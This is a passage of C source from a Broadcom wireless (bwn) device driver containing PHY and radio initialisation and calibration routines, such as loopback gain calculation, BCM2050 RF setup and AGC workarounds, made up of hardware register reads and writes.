0x0035, 0xffc0, 0x0064); BWN_PHY_SETMASK(mac, 0x005d, 0xff80, 0x000a); } if (mac->mac_flags & BWN_MAC_FLAG_BADFRAME_PREEMP) BWN_PHY_SET(mac, BWN_PHY_RADIO_BITFIELD, (1 << 11)); if (phy->analog == 1) { BWN_PHY_WRITE(mac, 0x0026, 0xce00); BWN_PHY_WRITE(mac, 0x0021, 0x3763); BWN_PHY_WRITE(mac, 0x0022, 0x1bc3); BWN_PHY_WRITE(mac, 0x0023, 0x06f9); BWN_PHY_WRITE(mac, 0x0024, 0x037e); } else BWN_PHY_WRITE(mac, 0x0026, 0xcc00); BWN_PHY_WRITE(mac, 0x0030, 0x00c6); BWN_WRITE_2(mac, 0x03ec, 0x3f22); if (phy->analog == 1) BWN_PHY_WRITE(mac, 0x0020, 0x3e1c); else BWN_PHY_WRITE(mac, 0x0020, 0x301c); if (phy->analog == 0) BWN_WRITE_2(mac, 0x03e4, 0x3000); old_channel = phy->chan; bwn_phy_g_switch_chan(mac, 7, 0); if (phy->rf_ver != 0x2050) { BWN_RF_WRITE(mac, 0x0075, 0x0080); BWN_RF_WRITE(mac, 0x0079, 0x0081); } BWN_RF_WRITE(mac, 0x0050, 0x0020); BWN_RF_WRITE(mac, 0x0050, 0x0023); if (phy->rf_ver == 0x2050) { BWN_RF_WRITE(mac, 0x0050, 0x0020); BWN_RF_WRITE(mac, 0x005a, 0x0070); } BWN_RF_WRITE(mac, 0x005b, 0x007b); BWN_RF_WRITE(mac, 0x005c, 0x00b0); BWN_RF_SET(mac, 0x007a, 0x0007); bwn_phy_g_switch_chan(mac, old_channel, 0); BWN_PHY_WRITE(mac, 0x0014, 0x0080); BWN_PHY_WRITE(mac, 0x0032, 0x00ca); BWN_PHY_WRITE(mac, 0x002a, 0x88a3); bwn_phy_g_set_txpwr_sub(mac, &pg->pg_bbatt, &pg->pg_rfatt, pg->pg_txctl); if (phy->rf_ver == 0x2050) BWN_RF_WRITE(mac, 0x005d, 0x000d); BWN_WRITE_2(mac, 0x03e4, (BWN_READ_2(mac, 0x03e4) & 0xffc0) | 0x0004); } static void bwn_loopback_calcgain(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; uint16_t backup_phy[16] = { 0 }; uint16_t backup_radio[3]; uint16_t backup_bband; uint16_t i, j, loop_i_max; uint16_t trsw_rx; uint16_t loop1_outer_done, loop1_inner_done; backup_phy[0] = BWN_PHY_READ(mac, BWN_PHY_CRS0); backup_phy[1] = BWN_PHY_READ(mac, BWN_PHY_CCKBBANDCFG); backup_phy[2] = BWN_PHY_READ(mac, BWN_PHY_RFOVER); backup_phy[3] = BWN_PHY_READ(mac, BWN_PHY_RFOVERVAL); if (phy->rev != 1) { backup_phy[4] = BWN_PHY_READ(mac, BWN_PHY_ANALOGOVER); backup_phy[5] = BWN_PHY_READ(mac, BWN_PHY_ANALOGOVERVAL); } backup_phy[6] = BWN_PHY_READ(mac, BWN_PHY_CCK(0x5a)); backup_phy[7] = BWN_PHY_READ(mac, BWN_PHY_CCK(0x59)); backup_phy[8] = BWN_PHY_READ(mac, BWN_PHY_CCK(0x58)); backup_phy[9] = BWN_PHY_READ(mac, BWN_PHY_CCK(0x0a)); backup_phy[10] = BWN_PHY_READ(mac, BWN_PHY_CCK(0x03)); backup_phy[11] = BWN_PHY_READ(mac, BWN_PHY_LO_MASK); backup_phy[12] = BWN_PHY_READ(mac, BWN_PHY_LO_CTL); backup_phy[13] = BWN_PHY_READ(mac, BWN_PHY_CCK(0x2b)); backup_phy[14] = BWN_PHY_READ(mac, BWN_PHY_PGACTL); backup_phy[15] = BWN_PHY_READ(mac, BWN_PHY_LO_LEAKAGE); backup_bband = pg->pg_bbatt.att; backup_radio[0] = BWN_RF_READ(mac, 0x52); backup_radio[1] = BWN_RF_READ(mac, 0x43); backup_radio[2] = BWN_RF_READ(mac, 0x7a); BWN_PHY_MASK(mac, BWN_PHY_CRS0, 0x3fff); BWN_PHY_SET(mac, BWN_PHY_CCKBBANDCFG, 0x8000); BWN_PHY_SET(mac, BWN_PHY_RFOVER, 0x0002); BWN_PHY_MASK(mac, BWN_PHY_RFOVERVAL, 0xfffd); BWN_PHY_SET(mac, BWN_PHY_RFOVER, 0x0001); BWN_PHY_MASK(mac, BWN_PHY_RFOVERVAL, 0xfffe); if (phy->rev != 1) { BWN_PHY_SET(mac, BWN_PHY_ANALOGOVER, 0x0001); BWN_PHY_MASK(mac, BWN_PHY_ANALOGOVERVAL, 0xfffe); BWN_PHY_SET(mac, BWN_PHY_ANALOGOVER, 0x0002); BWN_PHY_MASK(mac, BWN_PHY_ANALOGOVERVAL, 0xfffd); } BWN_PHY_SET(mac, BWN_PHY_RFOVER, 0x000c); BWN_PHY_SET(mac, BWN_PHY_RFOVERVAL, 0x000c); BWN_PHY_SET(mac, BWN_PHY_RFOVER, 0x0030); BWN_PHY_SETMASK(mac, BWN_PHY_RFOVERVAL, 0xffcf, 0x10); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x5a), 0x0780); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x59), 0xc810); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0x000d); BWN_PHY_SET(mac, BWN_PHY_CCK(0x0a), 0x2000); if (phy->rev != 1) { BWN_PHY_SET(mac, BWN_PHY_ANALOGOVER, 0x0004); BWN_PHY_MASK(mac, BWN_PHY_ANALOGOVERVAL, 0xfffb); } BWN_PHY_SETMASK(mac, BWN_PHY_CCK(0x03), 0xff9f, 0x40); if (phy->rf_rev == 8) BWN_RF_WRITE(mac, 0x43, 0x000f); else { BWN_RF_WRITE(mac, 0x52, 0); BWN_RF_SETMASK(mac, 0x43, 0xfff0, 0x9); } bwn_phy_g_set_bbatt(mac, 11); if (phy->rev >= 3) BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0xc020); else BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0x8020); BWN_PHY_WRITE(mac, BWN_PHY_LO_CTL, 0); BWN_PHY_SETMASK(mac, BWN_PHY_CCK(0x2b), 0xffc0, 0x01); BWN_PHY_SETMASK(mac, BWN_PHY_CCK(0x2b), 0xc0ff, 0x800); BWN_PHY_SET(mac, BWN_PHY_RFOVER, 0x0100); BWN_PHY_MASK(mac, BWN_PHY_RFOVERVAL, 0xcfff); if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_EXTLNA) { if (phy->rev >= 7) { BWN_PHY_SET(mac, BWN_PHY_RFOVER, 0x0800); BWN_PHY_SET(mac, BWN_PHY_RFOVERVAL, 0x8000); } } BWN_RF_MASK(mac, 0x7a, 0x00f7); j = 0; loop_i_max = (phy->rf_rev == 8) ? 15 : 9; for (i = 0; i < loop_i_max; i++) { for (j = 0; j < 16; j++) { BWN_RF_WRITE(mac, 0x43, i); BWN_PHY_SETMASK(mac, BWN_PHY_RFOVERVAL, 0xf0ff, (j << 8)); BWN_PHY_SETMASK(mac, BWN_PHY_PGACTL, 0x0fff, 0xa000); BWN_PHY_SET(mac, BWN_PHY_PGACTL, 0xf000); DELAY(20); if (BWN_PHY_READ(mac, BWN_PHY_LO_LEAKAGE) >= 0xdfc) goto done0; } } done0: loop1_outer_done = i; loop1_inner_done = j; if (j >= 8) { BWN_PHY_SET(mac, BWN_PHY_RFOVERVAL, 0x30); trsw_rx = 0x1b; for (j = j - 8; j < 16; j++) { BWN_PHY_SETMASK(mac, BWN_PHY_RFOVERVAL, 0xf0ff, j << 8); BWN_PHY_SETMASK(mac, BWN_PHY_PGACTL, 0x0fff, 0xa000); BWN_PHY_SET(mac, BWN_PHY_PGACTL, 0xf000); DELAY(20); trsw_rx -= 3; if (BWN_PHY_READ(mac, BWN_PHY_LO_LEAKAGE) >= 0xdfc) goto done1; } } else trsw_rx = 0x18; done1: if (phy->rev != 1) { BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVER, backup_phy[4]); BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVERVAL, backup_phy[5]); } BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x5a), backup_phy[6]); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x59), backup_phy[7]); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), backup_phy[8]); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x0a), backup_phy[9]); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x03), backup_phy[10]); BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, backup_phy[11]); BWN_PHY_WRITE(mac, BWN_PHY_LO_CTL, backup_phy[12]); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2b), backup_phy[13]); BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, backup_phy[14]); bwn_phy_g_set_bbatt(mac, backup_bband); BWN_RF_WRITE(mac, 0x52, backup_radio[0]); BWN_RF_WRITE(mac, 0x43, backup_radio[1]); BWN_RF_WRITE(mac, 0x7a, backup_radio[2]); BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, backup_phy[2] | 0x0003); DELAY(10); BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, backup_phy[2]); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, backup_phy[3]); BWN_PHY_WRITE(mac, BWN_PHY_CRS0, backup_phy[0]); BWN_PHY_WRITE(mac, BWN_PHY_CCKBBANDCFG, backup_phy[1]); pg->pg_max_lb_gain = ((loop1_inner_done * 6) - (loop1_outer_done * 4)) - 11; pg->pg_trsw_rx_gain = trsw_rx * 2; } static uint16_t bwn_rf_init_bcm2050(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; uint32_t tmp1 = 0, tmp2 = 0; uint16_t rcc, i, j, pgactl, cck0, cck1, cck2, cck3, rfover, rfoverval, analogover, analogoverval, crs0, classctl, lomask, loctl, syncctl, radio0, radio1, radio2, reg0, reg1, reg2, radio78, reg, index; static const uint8_t rcc_table[] = { 0x02, 0x03, 0x01, 0x0f, 0x06, 0x07, 0x05, 0x0f, 0x0a, 0x0b, 0x09, 0x0f, 0x0e, 0x0f, 0x0d, 0x0f, }; loctl = lomask = reg0 = classctl = crs0 = analogoverval = analogover = rfoverval = rfover = cck3 = 0; radio0 = BWN_RF_READ(mac, 0x43); radio1 = BWN_RF_READ(mac, 0x51); radio2 = BWN_RF_READ(mac, 0x52); pgactl = BWN_PHY_READ(mac, BWN_PHY_PGACTL); cck0 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x5a)); cck1 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x59)); cck2 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x58)); if (phy->type == BWN_PHYTYPE_B) { cck3 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x30)); reg0 = BWN_READ_2(mac, 0x3ec); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x30), 0xff); BWN_WRITE_2(mac, 0x3ec, 0x3f3f); } else if (phy->gmode || phy->rev >= 2) { rfover = BWN_PHY_READ(mac, BWN_PHY_RFOVER); rfoverval = BWN_PHY_READ(mac, BWN_PHY_RFOVERVAL); analogover = BWN_PHY_READ(mac, BWN_PHY_ANALOGOVER); analogoverval = BWN_PHY_READ(mac, BWN_PHY_ANALOGOVERVAL); crs0 = BWN_PHY_READ(mac, BWN_PHY_CRS0); classctl = BWN_PHY_READ(mac, BWN_PHY_CLASSCTL); BWN_PHY_SET(mac, BWN_PHY_ANALOGOVER, 0x0003); BWN_PHY_MASK(mac, BWN_PHY_ANALOGOVERVAL, 0xfffc); BWN_PHY_MASK(mac, BWN_PHY_CRS0, 0x7fff); BWN_PHY_MASK(mac, BWN_PHY_CLASSCTL, 0xfffc); if (BWN_HAS_LOOPBACK(phy)) { lomask = BWN_PHY_READ(mac, BWN_PHY_LO_MASK); loctl = BWN_PHY_READ(mac, BWN_PHY_LO_CTL); if (phy->rev >= 3) BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0xc020); else BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0x8020); BWN_PHY_WRITE(mac, BWN_PHY_LO_CTL, 0); } BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(0, 1, 1))); BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVER, 0)); } BWN_WRITE_2(mac, 0x3e2, BWN_READ_2(mac, 0x3e2) | 0x8000); syncctl = BWN_PHY_READ(mac, BWN_PHY_SYNCCTL); BWN_PHY_MASK(mac, BWN_PHY_SYNCCTL, 0xff7f); reg1 = BWN_READ_2(mac, 0x3e6); reg2 = BWN_READ_2(mac, 0x3f4); if (phy->analog == 0) BWN_WRITE_2(mac, 0x03e6, 0x0122); else { if (phy->analog >= 2) BWN_PHY_SETMASK(mac, BWN_PHY_CCK(0x03), 0xffbf, 0x40); BWN_WRITE_2(mac, BWN_CHANNEL_EXT, (BWN_READ_2(mac, BWN_CHANNEL_EXT) | 0x2000)); } reg = BWN_RF_READ(mac, 0x60); index = (reg & 0x001e) >> 1; rcc = (((rcc_table[index] << 1) | (reg & 0x0001)) | 0x0020); if (phy->type == BWN_PHYTYPE_B) BWN_RF_WRITE(mac, 0x78, 0x26); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(0, 1, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xbfaf); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2b), 0x1403); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(0, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xbfa0); BWN_RF_SET(mac, 0x51, 0x0004); if (phy->rf_rev == 8) BWN_RF_WRITE(mac, 0x43, 0x1f); else { BWN_RF_WRITE(mac, 0x52, 0); BWN_RF_SETMASK(mac, 0x43, 0xfff0, 0x0009); } BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0); for (i = 0; i < 16; i++) { BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x5a), 0x0480); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x59), 0xc810); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0x000d); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xafb0); DELAY(10); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xefb0); DELAY(10); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 0))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xfff0); DELAY(20); tmp1 += BWN_PHY_READ(mac, BWN_PHY_LO_LEAKAGE); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xafb0); } DELAY(10); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0); tmp1++; tmp1 >>= 9; for (i = 0; i < 16; i++) { radio78 = (BWN_BITREV4(i) << 1) | 0x0020; BWN_RF_WRITE(mac, 0x78, radio78); DELAY(10); for (j = 0; j < 16; j++) { BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x5a), 0x0d80); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x59), 0xc810); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0x000d); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xafb0); DELAY(10); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xefb0); DELAY(10); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 0))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xfff0); DELAY(10); tmp2 += BWN_PHY_READ(mac, BWN_PHY_LO_LEAKAGE); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xafb0); } tmp2++; tmp2 >>= 8; if (tmp1 < tmp2) break; } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, pgactl); BWN_RF_WRITE(mac, 0x51, radio1); BWN_RF_WRITE(mac, 0x52, radio2); BWN_RF_WRITE(mac, 0x43, radio0); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x5a), cck0); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x59), cck1); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), cck2); BWN_WRITE_2(mac, 0x3e6, reg1); if (phy->analog != 0) BWN_WRITE_2(mac, 0x3f4, reg2); BWN_PHY_WRITE(mac, BWN_PHY_SYNCCTL, syncctl); bwn_spu_workaround(mac, phy->chan); if (phy->type == BWN_PHYTYPE_B) { BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x30), cck3); BWN_WRITE_2(mac, 0x3ec, reg0); } else if (phy->gmode) { BWN_WRITE_2(mac, BWN_PHY_RADIO, BWN_READ_2(mac, BWN_PHY_RADIO) & 0x7fff); BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, rfover); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, rfoverval); BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVER, analogover); BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVERVAL, analogoverval); BWN_PHY_WRITE(mac, BWN_PHY_CRS0, crs0); BWN_PHY_WRITE(mac, BWN_PHY_CLASSCTL, classctl); if (BWN_HAS_LOOPBACK(phy)) { BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, lomask); BWN_PHY_WRITE(mac, BWN_PHY_LO_CTL, loctl); } } return ((i > 15) ? radio78 : rcc); } static void bwn_phy_init_b6(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; uint16_t offset, val; uint8_t old_channel; KASSERT(!(phy->rf_rev == 6 || phy->rf_rev == 7), ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, 0x003e, 0x817a); BWN_RF_WRITE(mac, 0x007a, BWN_RF_READ(mac, 0x007a) | 0x0058); if (phy->rf_rev == 4 || phy->rf_rev == 5) { BWN_RF_WRITE(mac, 0x51, 0x37); BWN_RF_WRITE(mac, 0x52, 0x70); BWN_RF_WRITE(mac, 0x53, 0xb3); BWN_RF_WRITE(mac, 0x54, 0x9b); BWN_RF_WRITE(mac, 0x5a, 0x88); BWN_RF_WRITE(mac, 0x5b, 0x88); BWN_RF_WRITE(mac, 0x5d, 0x88); BWN_RF_WRITE(mac, 0x5e, 0x88); BWN_RF_WRITE(mac, 0x7d, 0x88); bwn_hf_write(mac, bwn_hf_read(mac) | BWN_HF_TSSI_RESET_PSM_WORKAROUN); } if (phy->rf_rev == 8) { BWN_RF_WRITE(mac, 0x51, 0); BWN_RF_WRITE(mac, 0x52, 0x40); BWN_RF_WRITE(mac, 0x53, 0xb7); BWN_RF_WRITE(mac, 0x54, 0x98); BWN_RF_WRITE(mac, 0x5a, 0x88); BWN_RF_WRITE(mac, 0x5b, 0x6b); BWN_RF_WRITE(mac, 0x5c, 0x0f); if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_ALTIQ) { BWN_RF_WRITE(mac, 0x5d, 0xfa); BWN_RF_WRITE(mac, 0x5e, 0xd8); } else { BWN_RF_WRITE(mac, 0x5d, 0xf5); BWN_RF_WRITE(mac, 0x5e, 0xb8); } BWN_RF_WRITE(mac, 0x0073, 0x0003); BWN_RF_WRITE(mac, 0x007d, 0x00a8); BWN_RF_WRITE(mac, 0x007c, 0x0001); BWN_RF_WRITE(mac, 0x007e, 0x0008); } for (val = 0x1e1f, offset = 0x0088; offset < 0x0098; offset++) { BWN_PHY_WRITE(mac, offset, val); val -= 0x0202; } for (val = 0x3e3f, offset = 0x0098; offset < 0x00a8; offset++) { BWN_PHY_WRITE(mac, offset, val); val -= 0x0202; } for (val = 0x2120, offset = 0x00a8; offset < 0x00c8; offset++) { BWN_PHY_WRITE(mac, offset, (val & 0x3f3f)); val += 0x0202; } if (phy->type == BWN_PHYTYPE_G) { BWN_RF_SET(mac, 0x007a, 0x0020); BWN_RF_SET(mac, 0x0051, 0x0004); BWN_PHY_SET(mac, 0x0802, 0x0100); BWN_PHY_SET(mac, 0x042b, 0x2000); BWN_PHY_WRITE(mac, 0x5b, 0); BWN_PHY_WRITE(mac, 0x5c, 0); } old_channel = phy->chan; bwn_phy_g_switch_chan(mac, (old_channel >= 8) ? 1 : 13, 0); BWN_RF_WRITE(mac, 0x0050, 0x0020); BWN_RF_WRITE(mac, 0x0050, 0x0023); DELAY(40); if (phy->rf_rev < 6 || phy->rf_rev == 8) { BWN_RF_WRITE(mac, 0x7c, BWN_RF_READ(mac, 0x7c) | 0x0002); BWN_RF_WRITE(mac, 0x50, 0x20); } if (phy->rf_rev <= 2) { BWN_RF_WRITE(mac, 0x7c, 0x20); BWN_RF_WRITE(mac, 0x5a, 0x70); BWN_RF_WRITE(mac, 0x5b, 0x7b); BWN_RF_WRITE(mac, 0x5c, 0xb0); } BWN_RF_SETMASK(mac, 0x007a, 0x00f8, 0x0007); bwn_phy_g_switch_chan(mac, old_channel, 0); BWN_PHY_WRITE(mac, 0x0014, 0x0200); if (phy->rf_rev >= 6) BWN_PHY_WRITE(mac, 0x2a, 0x88c2); else BWN_PHY_WRITE(mac, 0x2a, 0x8ac0); BWN_PHY_WRITE(mac, 0x0038, 0x0668); bwn_phy_g_set_txpwr_sub(mac, &pg->pg_bbatt, &pg->pg_rfatt, pg->pg_txctl); if (phy->rf_rev <= 5) BWN_PHY_SETMASK(mac, 0x5d, 0xff80, 0x0003); if (phy->rf_rev <= 2) BWN_RF_WRITE(mac, 0x005d, 0x000d); if (phy->analog == 4) { BWN_WRITE_2(mac, 0x3e4, 9); BWN_PHY_MASK(mac, 0x61, 0x0fff); } else BWN_PHY_SETMASK(mac, 0x0002, 0xffc0, 0x0004); if (phy->type == BWN_PHYTYPE_B) KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); else if (phy->type == BWN_PHYTYPE_G) BWN_WRITE_2(mac, 0x03e6, 0x0); } static void bwn_phy_init_a(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; KASSERT(phy->type == BWN_PHYTYPE_A || phy->type == BWN_PHYTYPE_G, ("%s:%d: fail", __func__, __LINE__)); if (phy->rev >= 6) { if (phy->type == BWN_PHYTYPE_A) BWN_PHY_MASK(mac, BWN_PHY_OFDM(0x1b), ~0x1000); if (BWN_PHY_READ(mac, BWN_PHY_ENCORE) & BWN_PHY_ENCORE_EN) BWN_PHY_SET(mac, BWN_PHY_ENCORE, 0x0010); else BWN_PHY_MASK(mac, BWN_PHY_ENCORE, ~0x1010); } bwn_wa_init(mac); if (phy->type == BWN_PHYTYPE_G && (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_PACTRL)) BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x6e), 0xe000, 0x3cf); } static void bwn_wa_write_noisescale(struct bwn_mac *mac, const uint16_t *nst) { int i; for (i = 0; i < BWN_TAB_NOISESCALE_SIZE; i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_NOISESCALE, i, nst[i]); } static void bwn_wa_agc(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; if (phy->rev == 1) { bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1_R1, 0, 254); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1_R1, 1, 13); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1_R1, 2, 19); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1_R1, 3, 25); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, 0, 0x2710); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, 1, 0x9b83); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, 2, 0x9b83); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, 3, 0x0f8d); BWN_PHY_WRITE(mac, BWN_PHY_LMS, 4); } else { bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1, 0, 254); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1, 1, 13); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1, 2, 19); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1, 3, 25); } BWN_PHY_SETMASK(mac, BWN_PHY_CCKSHIFTBITS_WA, (uint16_t)~0xff00, 0x5700); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x1a), ~0x007f, 0x000f); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x1a), ~0x3f80, 0x2b80); BWN_PHY_SETMASK(mac, BWN_PHY_ANTWRSETT, 0xf0ff, 0x0300); BWN_RF_SET(mac, 0x7a, 0x0008); BWN_PHY_SETMASK(mac, BWN_PHY_N1P1GAIN, ~0x000f, 0x0008); BWN_PHY_SETMASK(mac, BWN_PHY_P1P2GAIN, ~0x0f00, 0x0600); BWN_PHY_SETMASK(mac, BWN_PHY_N1N2GAIN, ~0x0f00, 0x0700); BWN_PHY_SETMASK(mac, BWN_PHY_N1P1GAIN, ~0x0f00, 0x0100); if (phy->rev == 1) BWN_PHY_SETMASK(mac, BWN_PHY_N1N2GAIN, ~0x000f, 0x0007); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x88), ~0x00ff, 0x001c); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x88), ~0x3f00, 0x0200); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x96), ~0x00ff, 0x001c); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x89), ~0x00ff, 0x0020); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x89), ~0x3f00, 0x0200); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x82), ~0x00ff, 0x002e); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x96), (uint16_t)~0xff00, 0x1a00); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x81), ~0x00ff, 0x0028); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x81), (uint16_t)~0xff00, 0x2c00); if (phy->rev == 1) { BWN_PHY_WRITE(mac, BWN_PHY_PEAK_COUNT, 0x092b); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x1b), ~0x001e, 0x0002); } else { BWN_PHY_MASK(mac, BWN_PHY_OFDM(0x1b), ~0x001e); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x1f), 0x287a); BWN_PHY_SETMASK(mac, BWN_PHY_LPFGAINCTL, ~0x000f, 0x0004); if (phy->rev >= 6) { BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x22), 0x287a); BWN_PHY_SETMASK(mac, BWN_PHY_LPFGAINCTL, (uint16_t)~0xf000, 0x3000); } } BWN_PHY_SETMASK(mac, BWN_PHY_DIVSRCHIDX, 0x8080, 0x7874); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x8e), 0x1c00); if (phy->rev == 1) { BWN_PHY_SETMASK(mac, BWN_PHY_DIVP1P2GAIN, ~0x0f00, 0x0600); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x8b), 0x005e); BWN_PHY_SETMASK(mac, BWN_PHY_ANTWRSETT, ~0x00ff, 0x001e); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x8d), 0x0002); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3_R1, 0, 0); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3_R1, 1, 7); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3_R1, 2, 16); 